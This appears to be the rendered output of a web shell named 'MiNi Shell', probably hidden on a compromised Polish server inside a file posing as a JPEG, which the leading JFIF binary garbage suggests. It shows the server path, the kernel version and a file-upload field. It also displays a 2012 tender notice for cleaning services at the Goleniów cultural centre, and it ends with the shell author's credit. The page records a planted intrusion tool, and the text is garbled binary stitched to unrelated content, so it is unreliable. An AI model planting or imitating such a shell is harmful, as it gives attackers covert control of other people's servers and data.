JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120329/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120329/98120-N-2012.html

<p class="kh_header"><b>Goleniów: Wykonywanie usług sprzątania na terenie Goleniowskiego Domu Kultury, Bramy Wolińskiej, Amfiteatrze w roku 2012</b><br>
<b>Numer ogłoszenia: 98120 - 2012; data zamieszczenia: 29.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Goleniowski Dom Kultury , ul. Słowackiego 1, 72-100 Goleniów, woj. zachodniopomorskie, tel. 91 418 26 88, faks 91 418 26 88.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> gdk.goleniow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Dom Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie usług sprzątania na terenie Goleniowskiego Domu Kultury, Bramy Wolińskiej, Amfiteatrze w roku 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. W soboty od 06.00 do 14.00
1) Goleniowski Dom Kultury, ul. Słowackiego 1 72-100 Goleniów (pow. 648,7 m2 - sala widowiskowa z zapleczem, sala klubowa, sala nr 8)
a. Czynności wykonywane raz w tygodniu:
Zamiatanie i oczyszczenie (w sposób odpowiedni dla rodzaju powierzchni) płytek ceramicznych, paneli i wykładzin odpowiednimi środkami czyszcząco - konserwującymi w pomieszczeniach o ogólnej powierzchni  648,7 m2 - sala widowiskowa z zapleczem, sala klubowa, sala nr 8,
Ścieranie na mokro kurzu z parapetów okiennych, mebli, stołów, krzeseł, blatów znajdujących się w pomieszczeniach przeznaczonych do sprzątania, kaloryferów oraz z urządzeń biurowych przez zastosowanie odpowiednich środków konserwacyjnych,
Opróżnianie koszy na śmieci znajdujących się  na korytarzach i toaletach,
Sprzątanie toalet, mycie klozetów, umywalek tj.: mycie na mokro podłóg, czyszczenie umywalek (4 szt.) i klozetów (4 szt.). Mycie: luster, glazury ściennej oraz pojemników na mydło, papier toaletowy i ręczniki odpowiednimi do tego środkami czyszcząco -  dezynfekującymi,
Sprzątanie garderób poprzez mycie na mokro toalet (2 szt.), kabin prysznicowych (2 szt.), umywalek (2 szt.), klozetów (2 szt.) odpowiednimi do tego środkami czyszcząco -  dezynfekującymi. Mycie: luster, glazury ściennej, pojemników na mydło, pojemników na papier toaletowy, oczyszczanie na mokro kurzu z blatów, szafek odpowiednimi do tego środkami czystośc - konserwującymi oraz odkurzenie powierzchni wykładzinowej odkurzaczem przemysłowym w garderobie,
Sprzątanie sali widowiskowej poprzez zmywanie na mokro powierzchni scenicznej środkami konserwującymi oraz odkurzanie powierzchni wykładzinowej odkurzaczem przemysłowym na sali widowiskowej,
Mycie drzwi wejściowych (wraz z framugami) i przelotowych na korytarzach oraz utrzymanie w należytej czystości powierzchni szklanych ww. elementów (zastosowanie odpowiednich środków chemicznych),
Czyszczenia z kurzu elementów wyposażenia znajdujących się na korytarzach  (obrazy, listwy naścienne zabezpieczające, kontakty elektryczne, stoły, ławki, pleksi lustrzane itp.) przez zastosowanie odpowiednich środków konserwacyjnych,
Omiatanie pajęczyn w pomieszczeniach przewidzianych do sprzątania. 
b. Czynności wykonywane dwa razy do roku - kwiecień/ maj, październik /listopad):
mycie wszystkich okien i powierzchni okiennych, łącznie z myciem żaluzji pionowych (pow. 246.3 m2) oraz przez mycie kaloryferów - (85 szt.) przez zastosowanie odpowiednich środków chemicznych,
Wycieranie odpowiednimi do tego typu środkami chemiczno - konserwacyjnymi tapicerki foteli oraz kanap skórzanych,
Czyszczenie i pranie wykładzin (pow. 264 m2). przez zastosowanie odpowiednich środków konserwacyjnych i urządzeń zmechanizowanych.
c. Czynności wykonywane raz na rok:
- Pranie tapicerki przez zastosowanie odpowiednich środków konserwacyjnych i urządzeń zmechanizowanych, (fotele na sali widowiskowej pow. 264,00 m2).

1.2. W poniedziałek od godz. 08.00 do godz. 15.00
2) Teatr Brama, ul. Zielona Droga 9 72-100 Goleniów (pow. 223,496 m2)
a. Czynności wykonywane raz w tygodniu:Zamiatanie i oczyszczenie (w sposób odpowiedni dla rodzaju powierzchni) płytek ceramicznych, paneli i powierzchni drewnianych w pomieszczeniach i na korytarzach odpowiednimi środkami czyszcząco - konserwującymi, (pow. 223,496 m2)
Sprzątanie pomieszczeń użytkowych poprzez ścieranie na mokro kurzu z parapetów okiennych, biurek i mebli biurowych, znajdujących się w pomieszczeniach przeznaczonych do sprzątania, kaloryferów oraz z urządzeń biurowych takich jak aparaty telefoniczne, monitory, drukarki przez zastosowanie odpowiednich środków konserwacyjnych.
Opróżnianie koszy na śmieci znajdujących się w pomieszczeniach biurowych, na korytarzach i toaletach,
Sprzątanie toalet, umywalek, klozetów. Mycie na mokro podług, toalety (2 szt.), kabiny prysznicowej (1 szt.) czyszczenie  umywalek (2 szt.), klozetów (3 szt.), pisuaru (1 szt.), mycie luster, glazury ściennej oraz pojemników na mydło, papier toaletowy odpowiednimi do tego środkami czyszcząco -  dezynfekującymi,
Sprzątanie garderób poprzez odkurzenie powierzchni wykładzinowej odkurzaczem przemysłowym. 
Sprzątanie pomieszczenia kuchennego, poprzez mycie: glazury ściennej i terakoty podłogowej, czyszczenie zlewozmywaków (2 szt.), blatów kuchennych oraz pojemników na mydło, papier (odpowiednimi do tego środkami czyszcząco - konserwacyjno -  dezynfekującymi),
Mycie drzwi wejściowych (wraz z framugami) i przelotowych na korytarzach oraz utrzymanie w należytej czystości powierzchni szklanych ww. elementów (zastosowanie odpowiednich środków chemicznych),
Oczyszczanie z kurzu elementów wyposażenia znajdujących się na korytarzach i pomieszczeniach użytkowych (obrazy, listwy naścienne zabezpieczające, kontakty elektryczne, stoły, ławki, itp.) przez zastosowanie odpowiednich środków chemicznych,
Omiatanie pajęczyn w pomieszczeniach biurowych, korytarzach i pomieszczeniach.
b. Czynności wykonywane dwa razy w roku:
mycie wszystkich okien i powierzchni okiennych (17 m2) oraz mycie kaloryferów (15 szt.) przez zastosowanie odpowiednich środków chemicznych,


1.3. We środy od godz. 12.00 - 16.00
3) Brama Wolińska, Pl. Bramy Wolińskiej 1 72-100 Goleniów(pow. 225 m2)
       a. Czynności wykonywane raz w tygodniu:
   - Sprzątanie pomieszczeń Centrum Informacji Turystycznej  poprzez ścieranie kurzu z parapetów okiennych, biurek i mebli biurowych, oraz z urządzeń biurowych takich jak aparaty telefoniczne, monitory, drukarki, faksy odpowiednimi do tego środkami czyszcząco - konserwacyjnymi, czyszczenie na mokro powierzchni kamiennych znajdujących się na posadzce. Sprzątanie i czyszczenie urządzenia sanitarnego znajdującego się w CIT poprzez mycie toalety (1 szt.), umywalki (1 szt.), klozetu (1 szt.) odpowiednimi do tego środkami czyszcząco - konserwacyjno -  dezynfekującymi). Mycie glazury ściennej oraz pojemników na mydło, papier toaletowy odpowiednimi do tego środkami czystości, opróżnianie koszy na śmieci.
- Zamiatanie i oczyszczenie (w sposób odpowiedni dla rodzaju powierzchni) powierzchni drewnianych,  kamiennych,  wykładzin w pomieszczeniach i na korytarzach oraz schodach wiodących na poszczególne kondygnacje przez zastosowanie odpowiednich środków konserwujących,
      - Sprzątanie pomieszczeń użytkowych poprzez ścieranie  kurzu z parapetów okiennych, biurek i mebli biurowych, znajdujących się w pomieszczeniach przeznaczonych do sprzątania, kaloryferów oraz z urządzeń biurowych takich jak aparaty telefoniczne, monitory, drukarki odpowiednimi dotego środkami czyszcząco - konserwującymi,.
     - Opróżnianie koszy na śmieci znajdujących się w pomieszczeniach biurowych, na korytarzach i toaletach,
    - Sprzątanie toalet (1 szt.), umywalek (1 szt.), klozetu (1 szt.).  Mycie na mokro podług, czyszczenie umywalek i toalet, klozetu odpowiednimi do tego środkami czyszcząco - dezynfekującymi,  mycie: luster, glazury ściennej oraz pojemników na mydło, papier toaletowy odpowiednimi do tego środkami czystości,
      - Mycie drzwi wejściowych (wraz z framugami) i przelotowych na korytarzach oraz utrzymanie w należytej czystości powierzchni szklanych ww. elementów  (zastosowanie odpowiednich środków chemicznych),
      - Czyszczenia z kurzu elementów wyposażenia znajdujących się na korytarzach  Bramy Wolińskiej (zastosowanie odpowiednich środków konserwacyjnych),
      - Omiatanie pajęczyn w pomieszczeniach biurowych, korytarzach, klatkach schodowych, 
b. Czynności wykonywane dwa razy do roku:
- mycie wszystkich okien i powierzchni okiennych (pow. 55 m2) oraz mycie kaloryferów (25 szt.)(zastosowanie odpowiednich środków chemicznych),.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.92.00-4, 90.91.12.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.O udzielenie zamówienia ubiegać się mogą Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień (Dz. U. z 2007 r., Nr 223, poz. 1655 zpóźn. zm.) , a spełniający warunki zawarte w art. 22 ust. 1 w/w ustawy, a więc:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2. Celem spełnienia warunku zwartego w art. 22 ustawy Prawo zamówień publicznych Wykonawca musi wskazać, iż:

a) wykonał co najmniej 3 usługi w zakresie sprzątania pomieszczeń biurowych o wartości nie mniejszej niż 40.000,00 zł każda z trzech wykazanych usług.
3. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia, nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w pkt. 7 SIWZ. Z  treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że Wykonawca posiada potencjał techniczny zmechanizowany do wykonania zamówienia - załącznik nr 5 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia, nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w pkt. 7 SIWZ. Z  treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> gdk.goleniow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Goleniowski Dom Kultury
ul. Słowackiego 1, 72-100 Goleniów - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2012 godzina 12:00, miejsce: Goleniowski Dom Kultury
ul. Słowackiego 1, 72-100 Goleniów - pokój nr 27.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 24.05.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com